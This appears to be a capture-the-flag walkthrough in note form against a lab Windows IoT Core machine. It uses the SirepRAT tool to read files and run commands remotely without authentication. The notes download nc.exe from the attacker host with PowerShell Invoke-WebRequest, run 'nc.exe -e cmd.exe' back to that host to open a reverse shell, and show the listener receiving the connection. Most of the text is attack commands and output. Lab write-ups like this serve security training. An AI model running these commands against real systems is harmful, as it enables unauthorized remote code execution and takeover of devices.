2 :8080
http://10.10.10.204:8080
Requires basicAuth
| Windows Device Portal
# searching for default creds
Administrator:p@ssw0rd didn't work.
it is a Windows IOT Core on Respberry Pi. (as per online searches.)
# found exploit for Windows IOT Core
Using https://github.com/SafeBreach-Labs/SirepRAT
$ python3 SirepRAT.py --help
usage: SirepRAT.py target_device_ip command_type [options]
Exploit Windows IoT Core's Sirep service to execute remote commands on the device
positional arguments:
target_device_ip The IP address of the target IoT Core device
command_type The Sirep command to use. Available commands are listed below
optional arguments:
-h, --help show this help message and exit
--return_output Set to have the target device return the command output stream
--cmd CMD Program path to execute
--as_logged_on_user Set to impersonate currently logged on user on the target device
--args ARGS Arguments string for the program
--base_directory BASE_DIRECTORY
The working directory from which to run the desired program
--remote_path REMOTE_PATH
Path on target device
--data DATA Data string to write to file
--v Verbose - if printable, print result
--vv Very verbose - print socket buffers and more
available commands:
* LaunchCommandWithOutput
* PutFileOnDevice
* GetFileFromDevice
* GetFileInformationFromDevice
* GetSystemInformationFromDevice
remarks:
- Use moustaches to wrap remote environment variables to expand (e.g. {{userprofile}})
Usage example: python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path C:\Windows\System32\hostname.exe
$ python3 SirepRAT.py 10.10.10.204 GetSystemInformationFromDevice
<SystemInformationResult | type: 51, payload length: 32, kv: {'dwOSVersionInfoSize': 0, 'dwMajorVersion': 10, 'dwMinorVersion': 0, 'dwBuildNumber': 17763, 'dwPlatformId': 2, 'szCSDVersion': 0, 'wServicePackMajor': 1, 'wServicePackMinor': 2, 'wSuiteMask': 0, 'wProductType': 0, 'wReserved': 0}>
$ python3 SirepRAT.py 10.10.10.204 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
---------
---------
---------
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<FileResult | type: 31, payload length: 824, payload peek: 'b'# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# Th''>
# its working.
# there is no certutil.exe, whoami
# tried powershell encoded revshell - didn't work.
# was having issues running basic commands but adding flag --v printed everything and works
$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c dir C:\ " --v
---------
---------
---------
Volume in drive C is MainOS
Volume Serial Number is 3C37-C677
Directory of C:\
07/20/2020 02:36 AM <DIR> $Reconfig$
10/26/2018 11:35 PM <JUNCTION> Data [\??\Volume{ac55f613-7018-45c7-b1e9-7ddda60262fd}\]
09/29/2021 05:05 PM <DIR> inetput
10/26/2018 11:37 PM <DIR> Program Files
10/26/2018 11:38 PM <DIR> PROGRAMS
10/26/2018 11:37 PM <DIR> SystemData
10/26/2018 11:37 PM <DIR> Users
07/03/2020 10:35 PM <DIR> Windows
0 File(s) 0 bytes
8 Dir(s) 583,135,232 bytes free
---------
---------
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 632, payload peek: 'b' Volume in drive C is MainOS\r\n Volume Serial Numbe''>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>
the directory path for IIS is changed - c:\inetput\wwwwroot\
| nothing inside here.
$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c cd " --v
---------
C:\windows\system32
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 21, payload peek: 'b'C:\\windows\\system32\r\n''>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>
# we could be SYSTEM
# we can use powershell iwr
$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c powershell Invoke-WebRequest -Uri http://10.10.16.7/nc.exe -Outfile C:\inetput\wwwwroot\nc.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>
$ python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c C:\inetput\wwwwroot\nc.exe -e C:\Windows\System32\cmd.exe 10.10.16.7 6969 "
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.204] 49671
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.
C:\windows\system32>
Last updated